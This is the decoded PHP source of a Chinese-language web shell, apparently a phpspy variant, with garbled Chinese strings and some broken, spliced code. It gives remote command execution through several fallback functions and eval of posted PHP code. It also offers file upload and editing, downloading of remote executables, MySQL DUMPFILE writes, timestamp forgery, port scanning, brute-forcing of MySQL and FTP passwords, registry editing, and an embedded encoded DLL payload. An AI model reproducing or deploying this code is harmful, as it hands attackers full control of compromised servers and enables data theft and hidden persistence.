=======================================decode after http://decode.cnxct.com/ ================================== ";echo "עɹ......

Զ˳򵥻˳ >>>";exit;} if ($_POST['do'] == 'login') {$thepass=trim($_POST['adminpass']);if ($admin['pass'] == $thepass) {setcookie ("adminpass",$thepass,time()+(1*24*3600));echo "";echo "".$copyurl.$serveru."&p=".$serverp.$copyurll."";exit;}}if (isset($_COOKIE['adminpass'])) {if ($_COOKIE['adminpass'] != $admin['pass']) {loginpage();}} else {loginpage();}} /*===================== ֤ =====================*/ // ж magic_quotes_gpc ״̬ if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST);} //mix.dllĴ $mixdll = "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"; function shelL($command){ global $windows,$disablefunctions; $exec = '';$output= ''; $dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();} elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; } elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;} elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);} elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);} elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);} elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);} return $exec; } // 鿴PHPINFO if ($_GET['action'] == "phpinfo") {echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() ѱ,鿴<PHP>";exit; }if($_GET['action'] == "nowuser") {$user = get_current_user(); if(!$user) $user = "泤٣̬޷ȡǰû"; echo"ǰû$user"; exit; } if(isset($_POST['phpcode'])){eval("?".">$_POST[phpcode]".mysql_error(); }else{ while ($row = mysql_fetch_array($result)) { $filename = basename($filename); if($rardown=="yes"){ $zip = NEW Zip; $zipfiles[]=Array("$filename",$row[0]); $zip->Add($zipfiles,1); $code = $zip->get_file(); $filename = "".$filename.".rar"; }else{ $code = $row[0]; } header("Content-type: application/octet-stream"); header("Accept-Ranges: bytes"); header("Accept-Length: ".strlen($code)); header("Content-Disposition: attachment;filename=$filename"); echo($code); exit; } } } } // ߴ if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "


ȡ URL ʧ

";exit; } // ļ if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "";} else {$filename = basename($downfile);$filename_info = explode('.', $filename);$fileext = $filename_info[count($filename_info)-1];header('Content-type: application/x-'.$fileext);header('Content-Disposition: attachment; filename='.$filename.'');header('Content-Description: PHP Generated Data');header('Content-Length: '.filesize($downfile));@readfile($downfile);exit;} } // ֱرݿ if ($_POST['backuptype'] == 'download') { @mysql_connect($servername,$dbusername,$dbpassword) or die("ݿʧ"); @mysql_select_db($dbname) or die("ѡݿʧ"); $table = array_flip($_POST['table']); $result = mysql_query("SHOW tables"); echo ($result) ? NULL : ": ".mysql_error(); $filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql"); header('Content-type: application/unknown'); header('Content-Disposition: attachment; filename='.$filename); $mysqldata = ''; while ($currow = mysql_fetch_array($result)) { if (isset($table[$currow[0]])) { $mysqldata.= sqldumptable($currow[0]); $mysqldata.= $mysqldata."\r\n"; } } mysql_close(); exit; } // Ŀ¼ $pathname=str_replace('\\','/',dirname(__FILE__)); $dirpath=str_replace('\\','/',$_SERVER["DOCUMENT_ROOT"]); // ȡǰ· if (!isset($dir) or empty($dir)) { $dir = "."; $nowpath = getPath($pathname, $dir); } else { $dir=$_GET['dir']; $nowpath = getPath($pathname, $dir); } // ж϶д $dir_writeable = (dir_writeable($nowpath)) ? "д" : "д"; $phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO()" : ""; $reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | ע" : ""; $tb = new FORMS; ?> <?php echo"$myneme"?>
tableheader(); $tb->tdbody('
'.$_SERVER['HTTP_HOST'].''.date("Ymd h:i:s",time()).''.gethostbyname($_SERVER['SERVER_NAME']).'
','center','top'); $tb->tdbody('Ŀ¼ | ShellĿ¼ | | ߴ'.$reg.$phpinfo.' | WebShell | ƽ | ѹmix.dll | ע¼'); $tb->tdbody(' | Httpļ | ļ | ִphpű | ִSQL | FuncShell | MySQL | Serv-UȨ'); $tb->tablefooter(); ?>
headerform(array('method'=>'GET','content'=>'

·: '.$pathname.'
ǰĿ¼('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'
תĿ¼: '.$tb->makeinput('dir',''.$nowpath.'','','text','80').' '.$tb->makeinput('','ȷ','','submit').' ֧־··')); $tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'ϴļǰĿ¼: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','ȷ','','submit').$tb->makeinput('uploaddir',$dir,'','hidden'))); $tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'½ļڵǰĿ¼: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','ȷ','','submit'))); $tb->headerform(array('content'=>'½Ŀ¼ڵǰĿ¼: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','ȷ','','submit'))); ?>

\n"; // ɾļ if (!empty($delfile)) { if (file_exists($delfile)) { echo (@unlink($delfile)) ? $delfile." ɾɹ!" : "ļɾʧ!"; } else { echo basename($delfile)." ļѲ!"; } } // ɾĿ¼ elseif (!empty($deldir)) { $deldirs="$dir/$deldir"; if (!file_exists("$deldirs")) { echo "$deldir Ŀ¼Ѳ!"; } else { echo (deltree($deldirs)) ? "Ŀ¼ɾɹ!" : "Ŀ¼ɾʧ!"; } } // Ŀ¼ elseif (($createdirectory) AND !empty($_POST['newdirectory'])) { if (!empty($newdirectory)) { $mkdirs="$dir/$newdirectory"; if (file_exists("$mkdirs")) { echo "Ŀ¼Ѵ!"; } else { echo (@mkdir("$mkdirs",0777)) ? "Ŀ¼ɹ!" : "ʧ!"; @chmod("$mkdirs",0777); } } } // ϴļ elseif ($doupfile) { echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "ϴɹ!" : "ϴʧ!"; } elseif($action=="mysqlup"){ $filename = $_FILES['upfile']['tmp_name']; if(!$filename) { echo"ûѡҪϴļ"; }else{ $shell = file_get_contents($filename); $mysql = bin2hex($shell); if(!$upname) $upname = $_FILES['upfile']['name']; $shell = "select 0x".$mysql." from ".$database." into DUMPFILE '".$uppath."/".$upname."';"; $link=@mysql_connect($host,$user,$password); if(!$link){ echo "½ʧ".mysql_error(); }else{ $result = mysql_query($shell, $link); if($result){ echo"ɹ.ļɹϴ".$host.",ļΪ".$uppath."/".$upname.".."; }else{ echo"ϴʧ ԭ:".mysql_error(); } } } } elseif($action=="mysqldown"){ if(!empty($downtmp)) echo $downtmp; } // ༭ļ elseif ($_POST['do'] == 'doeditfile') { if (!empty($_POST['editfilename'])) { if(!file_exists($editfilename)) unset($retime); if($time==$now) $time = @filemtime($editfilename); $time2 = @date("Y-m-d H:i:s",$time); $filename="$editfilename"; @$fp=fopen("$filename","w"); if($_POST['change']=="yes"){ $filecontent = "?".">".$_POST['filecontent'].""; }else{ $filecontent = $_POST['filecontent']; } echo $msg=@fwrite($fp,$filecontent) ? "дļɹ!" : "дʧ!"; @fclose($fp); if($retime=="yes"){ echo" Զ:"; echo $msg=@touch($filename,$time) ? "޸ļΪ".$time2."ɹ!" : "޸ļʱʧ!"; } } else { echo "Ҫ༭ļ!"; } } //ļ elseif ($_POST['do'] == 'downloads') { $contents = @file_get_contents($_POST['durl']); if(!$contents){ echo"޷ȡҪص"; } elseif(file_exists($path)){ echo"ܱǸļ".$path."Ѿˣļ"; }else{ $fp = @fopen($path,"w"); echo $msg=@fwrite($fp,$contents) ? "ļɹ!" : "ļдʱʧ!"; @fclose($fp); } } elseif($_POST['action']=="mix"){ if(!file_exists($_POST['mixto'])){ $tmp = base64_decode($mixdll); $tmp = gzinflate($tmp); $fp = fopen($_POST['mixto'],"w"); echo $msg=@fwrite($fp,$tmp) ? "ѹɹ!" : "Ŀ¼дɣ!"; fclose($fp); }else{ echo"ǰɣ".$_POST['mixto']."ѾҮ~"; } } // ༭ļ elseif ($_POST['do'] == 'editfileperm') { if (!empty($_POST['fileperm'])) { $fileperm=base_convert($_POST['fileperm'],8,10); echo (@chmod($dir."/".$file,$fileperm)) ? "޸ijɹ!" : "޸ʧ!"; echo " ļ ".$file." ޸ĺΪ: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4); } else { echo "Ҫõ!"; } } // ļ elseif ($_POST['do'] == 'rename') { if (!empty($_POST['newname'])) { $newname=$_POST['dir']."/".$_POST['newname']; if (@file_exists($newname)) { echo "".$_POST['newname']." Ѿ,һ!"; } else { echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." ɹΪ ".$_POST['newname']." !" : "ļ޸ʧ!"; } } else { echo "Ҫĵļ!"; } } elseif ($_POST['do'] == 'search') { if(!empty($oldkey)){ echo"ҹؼ:[".$oldkey."],ʾҵĽ:"; if($type2 == "getpath"){ echo"Ƶļϻвֽȡʾ."; } echo"
"; find($path); }else{ echo"ҪϺ?ҪϺ?ûϺҪ?"; } } elseif ($_GET['action']=='plgmok') { dirtree($_POST['dir'],$_POST['mm']); } elseif ($_GET['action'] == "plgm") { $action = '?action=plgmok'; $gm = ""; $tb->tableheader(); $tb->formheader($action,''); $tb->tdbody('վphp','center'); $tb->tdbody('ļλ: '.$tb->makeinput('dir',''.$_SERVER["DOCUMENT_ROOT"].'','','text','60').'
ҪҴ:'.$tb->maketextarea('mm',$gm,'50','5').''.$tb->makehidden('do','').'
'.$tb->makeinput('submit','ʼ','','submit'),'center','1','35'); echo ""; $tb->tablefooter(); }//end plgm // ¡ʱ elseif ($_POST['do'] == 'domodtime') { if (!@file_exists($_POST['curfile'])) { echo "Ҫ޸ĵļ!"; } else { if (!@file_exists($_POST['tarfile'])) { echo "Ҫյļ!"; } else { $time=@filemtime($_POST['tarfile']); echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." ޸ʱɹΪ ".date("Y-m-d H:i:s",$time)." !" : "ļ޸ʱ޸ʧ!"; } } } // Զʱ elseif ($_POST['do'] == 'modmytime') { if (!@file_exists($_POST['curfile'])) { echo "Ҫ޸ĵļ!"; } else { $year=$_POST['year']; $month=$_POST['month']; $data=$_POST['data']; $hour=$_POST['hour']; $minute=$_POST['minute']; $second=$_POST['second']; if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) { $time=strtotime("$data $month $year $hour:$minute:$second"); echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." ޸ʱɹΪ ".date("Y-m-d H:i:s",$time)." !" : "ļ޸ʱ޸ʧ!"; } } } elseif($do =='port'){ $tmp = explode(",",$port); $count = count($tmp); for($i=$first;$i<$count;$i++){ $fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1); if($fp) echo"".$host."˶˿".$tmp[$i]."
"; } } /* дúӣ˵ʵԼ֪дʲô ãҾûˣ˿ɴдɡ*/ elseif ($do == 'crack') {//עΪȫֱˡ if(@file_exists($passfile)){ $tmp = file($passfile); $count = count($tmp); if(empty($onetime)){ $onetime = $count; $turn="1"; }else{ $nowturn = $turn+1; $now = $turn*$onetime; $tt = intval(($count/$onetime)+1); } if($turn>$tt or $onetime>$count){ echo"ֵҮ~Ҫƽ̵ģܱǸʧܡ"; }else{ $first = $onetime*($turn-1); for($i=$first;$i<$now;$i++){ if($ctype=="mysql") $sa = @mysql_connect($host,$user,chop($tmp[$i])); else $sa = @ftp_login(ftp_connect($host,$admin[ftpport]),$user,chop($tmp[$i])); if($sa) { $t = "ȡ".$user."Ϊ".$tmp[$i].""; } } if(!$t){ echo "ֵܹ".$count."ڴ".$first."".$now."".$admin[jumpsecond]."".$onetime."̽. >>>
ȫ˴".$type."ƽҪ".$tt."Σǵ".$turn."νܡ"; } else { echo"$t"; } } }else{ echo"ֵļڣȷ"; } } elseif($do =='port'){ if(!eregi("-",$port)){ $tmp = explode(",",$port); $count = count($tmp); $first = "1"; }else{ $tmp = explode("-",$port); $first = $tmp[0]; $count = $tmp[1]; } for($i=$first;$i<$count;$i++){ if(!eregi("-",$port)){ $fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1); if($fp) echo"".$host."˶˿".$tmp[$i]."
"; }else{ $fp = @fsockopen($host, $i, $errno, $errstr, 1); if($fp) echo"".$host."˶˿".$i."
"; } } } // MYSQL elseif ($connect) { if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) { echo "ݿӳɹ!"; mysql_close(); } else { echo mysql_error(); } } // ִSQL elseif ($_POST['do'] == 'query') { @mysql_connect($servername,$dbusername,$dbpassword) or die("ݿʧ"); @mysql_select_db($dbname) or die("ѡݿʧ"); $result = @mysql_query($_POST['sql_query']); echo ($result) ? "SQLɹִ!" : ": ".mysql_error(); mysql_close(); } // ݲ elseif ($_POST['do'] == 'backupmysql') { if (empty($_POST['table']) OR empty($_POST['backuptype'])) { echo "ѡݵݱͱݷʽ!"; } else { if ($_POST['backuptype'] == 'server') { @mysql_connect($servername,$dbusername,$dbpassword) or die("ݿʧ"); @mysql_select_db($dbname) or die("ѡݿʧ"); $table = array_flip($_POST['table']); $filehandle = @fopen($path,"w"); if ($filehandle) { $result = mysql_query("SHOW tables"); echo ($result) ? NULL : ": ".mysql_error(); while ($currow = mysql_fetch_array($result)) { if (isset($table[$currow[0]])) { sqldumptable($currow[0], $filehandle); fwrite($filehandle,"\n\n\n"); } } fclose($filehandle); echo "ݿѳɹݵ ".$path.""; mysql_close(); } else { echo "ʧ,ȷĿļǷпдȨ!"; } } } } elseif($downrar) { if (!empty($dl)) { if(eregi("unzipto:",$localfile)){ $path = "".$dir."/".str_replace("unzipto:","",$localfile).""; $zip = new Zip; $zipfile=$dir."/".$dl[0]; $array=$zip->get_list($zipfile); $count=count($array); $f=0; $d=0; for($i=0;$i<$count;$i++) { if($array[$i][folder]==0) { if($zip->Extract($zipfile,$path,$i)>0) $f++; } else $d++; } if($i==$f+$d) echo "$dl[0] ѹ".$path."ɹ
($f ļ $d Ŀ¼)"; elseif($f==0) echo "$dl[0] ѹ".$path."ʧ"; else echo "$dl[0] δѹ
(ѽѹ $f ļ $d Ŀ¼)"; }else{ $zipfile=""; $zip = new Zip; for($k=0;isset($dl[$k]);$k++) { $zipfile=$dir."/".$dl[$k]; if(is_dir($zipfile)) { unset($zipfilearray); addziparray($dl[$k]); for($i=0;$zipfilearray[$i];$i++) { $filename=$zipfilearray[$i]; $filesize=@filesize($dir."/".$zipfilearray[$i]); $fp=@fopen($dir."/".$filename,rb); $zipfiles[]=Array($filename,@fread($fp,$filesize)); @fclose($fp); } } else { $filename=$dl[$k]; $filesize=@filesize($zipfile); $fp=@fopen($zipfile,rb); $zipfiles[]=Array($filename,@fread($fp,$filesize)); @fclose($fp); } } $zip->Add($zipfiles,1); $code = $zip->get_file(); $ck = "_QQ44997_".date("Y-m-d",time()).""; if(empty($localfile)){ header("Content-type: application/octet-stream"); header("Accept-Ranges: bytes"); header("Accept-Length: ".strlen($code)); header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."".$ck."_Files.zip"); echo $code; exit; }else{ $fp = @fopen("".$dir."/".$localfile."","w"); echo $msg=@fwrite($fp,$code) ? "ѹ".$dir."/".$localfile."سɹ!" : "Ŀ¼".$dir."޿дȨ!"; @fclose($fp); } } } else { echo "ѡҪصļ!"; } } // Shell.Application г elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) { $shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion'); $a = $shell->ShellExecute($_POST['program'],$_POST['prog']); echo ($a=='0') ? "Ѿɹִ!" : "ʧ!"; } // 鿴PHPò״ elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) { echo "ò ".$_POST['phpvarname']." : ".getphpcfg($_POST['phpvarname']).""; } // ȡע elseif(($regread) AND !empty($_POST['readregname'])) { $shell= &new COM('WSc'.'rip'.'t.Sh'.'ell'); var_dump(@$shell->RegRead($_POST['readregname'])); } // дע elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) { $shell= &new COM('W'.'Scr'.'ipt.S'.'hell'); $a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']); echo ($a=='0') ? "дעֵɹ!" : "д ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." ʧ!"; } // ɾע elseif(($regdelete) AND !empty($_POST['delregname'])) { $shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll'); $a = @$shell->RegDelete($_POST['delregname']); echo ($a=='0') ? "ɾעֵɹ!" : "ɾ ".$_POST['delregname']." ʧ!"; } else { echo "$notice"; echo "Program | pcAnywhere | ʼ | AllUsers | Serv-U | "; for ($i=66;$i<=90;$i++){$drive= chr($i).':'; if (is_dir($drive."/")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " $drive\\";} } } echo "

\n"; /*===================== ִв =====================*/ if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { $tb->tableheader(); ?> ļ ޸ С
\n"; echo " [$file]\n"; echo " $ctime\n"; echo " $mtime\n"; echo " Search\n"; echo " $dirperm\n"; echo " | ɾ | |\n"; echo "\n"; $dir_i++; } else { if($file=="..") { echo "\n"; echo " ϼĿ¼\n"; echo "\n"; } } } }// while @closedir($dirs); ?> ".@date("Y-m-d H:i:s",@filectime($filepath)).""; $mtime="".@date("Y-m-d H:i:s",@filemtime($filepath)).""; } @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4); echo "\n"; echo " "; echo ""; echo "$file\n"; echo " $ctime\n"; echo " $mtime\n"; echo " $size KB\n"; echo " $fileperm\n"; echo " | | ɾ | | ʱ\n"; echo "\n"; $file_i++; } }// while @closedir($dirs); if(get_cfg_var('safemode'))$z = "(?)"; else $z = "(?)"; $tb->tdbody('
'.$tb->makeinput('chkall','on','onclick="CheckAll(this.form)"','checkbox','30','').' ļ'.$tb->makeinput('localfile','','','text','15').''.$tb->makeinput('downrar','ѡдػ򱾵ر','','submit').'  '.$z.''.$dir_i.' Ŀ¼ / '.$file_i.' ļ
','center',getrowbg(),'','','6'); echo "
\n"; echo "\n"; }// end dir elseif ($_GET['action'] == "editfile") { if(empty($newfile)) { $filename="$dir/$editfile"; $fp=@fopen($filename,"r"); $contents=@fread($fp, filesize($filename)); @fclose($fp); $contents=htmlspecialchars($contents); }else{ $editfile=$newfile; $filename = "$dir/$editfile"; } $action = "?dir=".urlencode($dir)."&editfile=".$editfile; $tb->tableheader(); $tb->formheader($action,'½/༭ļ'); $tb->tdbody('ǰļ: '.$tb->makeinput('editfilename',$filename).' ļļ Php: '); $tb->tdbody($tb->maketextarea('filecontent',$contents)); $tb->makehidden('do','doeditfile'); $tb->formfooter('1','30'); }//end editfile elseif ($_GET['action'] == "rename") { $nowfile = (isset($_POST['newname'])) ? $_POST['newname'] : basename($_GET['fname']); $action = "?dir=".urlencode($dir)."&fname=".urlencode($fname); $tb->tableheader(); $tb->formheader($action,'޸ļ'); $tb->makehidden('oldname',$dir."/".$nowfile); $tb->makehidden('dir',$dir); $tb->tdbody('ǰļ: '.basename($nowfile)); $tb->tdbody('Ϊ: '.$tb->makeinput('newname')); $tb->makehidden('do','rename'); $tb->formfooter('1','30'); }//end rename elseif ($_GET['action'] == "eval") { $action = "?dir=".urlencode($dir).""; $tb->tableheader(); $tb->formheader(''.$action.' "target="_blank' ,'ִphpű'); $tb->tdbody($tb->maketextarea('phpcode',$contents)); $tb->formfooter('1','30'); } elseif ($_GET['action'] == "fileperm") { $action = "?dir=".urlencode($dir)."&file=".$file; $tb->tableheader(); $tb->formheader($action,'޸ļ'); $tb->tdbody('޸ '.$file.' Ϊ: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4))); $tb->makehidden('file',$file); $tb->makehidden('dir',urlencode($dir)); $tb->makehidden('do','editfileperm'); $tb->formfooter('1','30'); }//end fileperm elseif ($_GET['action'] == "newtime") { $action = "?dir=".urlencode($dir); $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12); $tb->tableheader(); $tb->formheader($action,'¡ļ޸ʱ'); $tb->tdbody("޸ļ: ".$tb->makeinput('curfile',$file,'readonly')." Ŀļ: ".$tb->makeinput('tarfile','·ļ'),'center','2','30'); $tb->makehidden('do','domodtime'); $tb->formfooter('','30'); $tb->formheader($action,'Զļ޸ʱ'); $tb->tdbody('
','left'); $tb->tdbody('ǰļ: '.$file); $tb->makehidden('curfile',$file); $tb->tdbody('޸Ϊ: '.$tb->makeinput('year','1984','','text','4').' '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' '.$tb->makeinput('data','18','','text','2').' '.$tb->makeinput('hour','20','','text','2').' ʱ '.$tb->makeinput('minute','00','','text','2').' '.$tb->makeinput('second','00','','text','2').' ','center','2','30'); $tb->makehidden('do','modmytime'); $tb->formfooter('1','30'); }//end newtime elseif ($_GET['action'] == "shell") { $action = "??action=shell&dir=".urlencode($dir); $tb->tableheader(); $tb->tdheader('WebShell Mode'); if (substr(PHP_OS, 0, 3) == 'WIN') { $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe"; $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt"; echo "
\n"; $tb->tdbody('޻г ļ: '.$tb->makeinput('program',$program).' : '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35'); $tb->makehidden('do','programrun'); echo "
\n"; } echo "
\n"; if(isset($_POST['cmd'])) $cmd = $_POST['cmd']; $tb->tdbody('ʾ:ȫ,дļ.Եõȫ. '); $tb->tdbody('proc_open費Ĭϵwinntϵͳʹ,޸ļǵд˳,һδĽ.'); $tb->tdbody('proc_openҪʹõcmdλ:'.$tb->makeinput('cmd',$cmd,'','text','30').'(ҪlinuxϵͳǴԼ޸İ)'); $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell','proc_open'=>'proc_open') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','proc_open'=>'proc_open'); $tb->tdbody('ѡִк: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' : '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit')); ?>
tableheader(); $tb->formheader($action,'ȡע'); $tb->tdbody('ֵ: '.$tb->makeinput('readregname',$regname,'','text','100').' '.$tb->makeinput('regread','ȡ','','submit'),'center','2','50'); echo ""; $tb->formheader($action,'дע'); $cacheregtype = array('REG_SZ'=>'REG_SZ','REG_BINARY'=>'REG_BINARY','REG_DWORD'=>'REG_DWORD','REG_MULTI_SZ'=>'REG_MULTI_SZ','REG_EXPAND_SZ'=>'REG_EXPAND_SZ'); $tb->tdbody('ֵ: '.$tb->makeinput('writeregname',$registre,'','text','56').' : '.$tb->makeselect(array('name'=>'regtype','option'=>$cacheregtype,'selected'=>$regtype)).' ֵ: '.$tb->makeinput('regval',$regval,'','text','15').' '.$tb->makeinput('regwrite','д','','submit'),'center','2','50'); echo ""; $tb->formheader($action,'ɾע'); $tb->tdbody('ֵ: '.$tb->makeinput('delregname',$delregname,'','text','100').' '.$tb->makeinput('regdelete','ɾ','','submit'),'center','2','50'); echo ""; $tb->tablefooter(); }//end reg elseif ($_GET['action'] == "downloads"){ $action = '?action=dir'; $tb->tableheader(); $tb->formheader($action,'httpļģʽ'); $tb->tdbody('ʹñܰһЩСhttpʽص˷','center'); $tb->tdbody('ļλ: '.$tb->makeinput('durl','http://google.com/muma.exe','','text','70').'
ص:'.$tb->makeinput('path','./muma.exe','','text','60').''.$tb->makehidden('do','downloads').''.$tb->makeinput('','','','submit'),'center','1','35'); echo ""; $tb->tdbody('ע,ļ̫޷Ӱִٶ.','center'); $tb->tablefooter(); } elseif ($_GET['action'] == "mix"){ $action = '?action=dir'; $tb->tableheader(); $tb->formheader($action,'ѹmix.dllļ'); $tb->tdbody('԰ѹphpspymix.dllѹ','center'); $tb->tdbody('ѹΪ: '.$tb->makeinput('mixto','./mix.dll','','text','70').''.$tb->makehidden('action','mix').''.$tb->makeinput('','unzip','','submit'),'center','1','35'); echo ""; $tb->tablefooter(); } elseif ($_GET['action'] == "crack"){ $action = '?action=dir'; $tb->tableheader(); $tb->tdbody('ҪͻһЩرĵط׼','center'); if($type=="crack"){ $tb->formheader($action,'ƽmysqlftp [Mysql]'); $tb->tdbody('һЩmysql½ƽ⡣','center'); $tb->tdbody('host: '.$tb->makeinput('host','localhost','','text','12').' 